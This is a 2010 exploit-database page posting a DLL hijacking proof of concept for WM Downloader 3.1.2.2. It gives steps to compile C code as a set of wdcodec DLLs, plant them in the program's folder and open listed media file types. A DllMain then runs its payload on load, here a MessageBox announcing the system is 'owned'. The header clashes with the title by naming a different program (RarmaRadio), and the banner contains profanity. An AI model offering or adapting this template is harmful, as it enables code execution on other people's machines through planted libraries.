Home / os / win7

[local exploits] - WM Downloader 3.1.2.2 DLL Hijacking Explo

Posted on 28 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>WM Downloader 3.1.2.2 DLL Hijacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='WM Downloader 3.1.2.2 DLL Hijacking Exploit by anT!-Tr0J4n in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=========================================== WM Downloader 3.1.2.2 DLL Hijacking Exploit =========================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /&#039; /&#039;__` /&#039;__` /\_____ / / 7 1 /\_, /\_L /\_L \/___//&#039;/&#039; \_ \____ 1 3 /_/ /_/_\_&lt;_/_/_\_&lt;_ /&#039; /&#039; /&#039;_` &#039;__` 3 3 / L / L /&#039; /&#039; / L L 3 7 \_ \____/ \____//\_/ \___,_ \_,__/ 7 1 /_//___/ /___/ // /__,_ //___/ 1 3 &gt;&gt; Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ############################################## 7 1 I&#039;m anT!-Tr0J4n 1337 Member from 1337 DataBase 1 3 ############################################## 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 .....................X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada ... .......................................Fuck ALL lamers Top-t34m................... .............................../??/)..............(?`...... ....... ............................../....//............................. ............................./....//.............................. ......................../??/..../??............/?` ....?`......... ....................././.../..../..../.|_....._|................ ...................(.(....(....(..../.)..).....(..(.....)....)....).) ..................................../.../......./................/ ..................................... /........................../. ....................................(............)............../... ................................................/............./.... #Title: RarmaRadio Version 2.53.1 Bass 2.4 DLL Hijacking Exploit #Author : anT!-Tr0J4n #Inj3ct0r Site : http://1337db.com #Email : D3v-PoinT[at]hotmail[d0t]com &amp; C1EH[at]Hotmail[d0t]com #Greetz : Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil #special thanks : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu #Home : www.Dev-PoinT.com $ http://1337db.com/ #Software : http://www.mini-stream.net/ #Version : 3.1.2.2 #Tested on: Windows XP sp3 ----------------------------------- [+] Compile code as + wdcodec03.dll + wdcodec04.dll + wdcodec05.dll + wdcodec06.dll + wdcodec08.dll + wdcodec09.dll + wdcodec10.dll + wdcodec11.dll + wdcodec12.dll + wdcodec13.dll [+] Move DLL file to the directory where WM Downloader is installed [+] check the result --&gt; [ Your System 0wn3d BY anT!-Tr0J4n ] [&lt;&lt;] exploit.m3u [&lt;&lt;] exploit.wav [&lt;&lt;] exploit.rm [&lt;&lt;] exploit.rmvb [&lt;&lt;] exploit.wma [&lt;&lt;] exploit.asx [&lt;&lt;] exploit.mpga [&lt;&lt;] exploit.mp3 [&lt;&lt;] exploit.ogg [&lt;&lt;] exploit.cda [&lt;&lt;] exploit.flac [&lt;&lt;] exploit.fla [&lt;&lt;] exploit.pls [&lt;&lt;] exploit.smi [&lt;&lt;] exploit.wpl =-=-==-=-=-=-==-=-==-=-=-==-=-=-==-=-=-=-= dll (code) */ #include &quot;stdafx.h&quot; void init() { MessageBox(NULL,&quot;Your System 0wn3d BY anT!-Tr0J4n&quot;, &quot;inj3ct0r&quot;,0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; # <a href='http://1337db.com/'>1337db.com</a> [2010-11-28]</pre></body></html>

 

TOP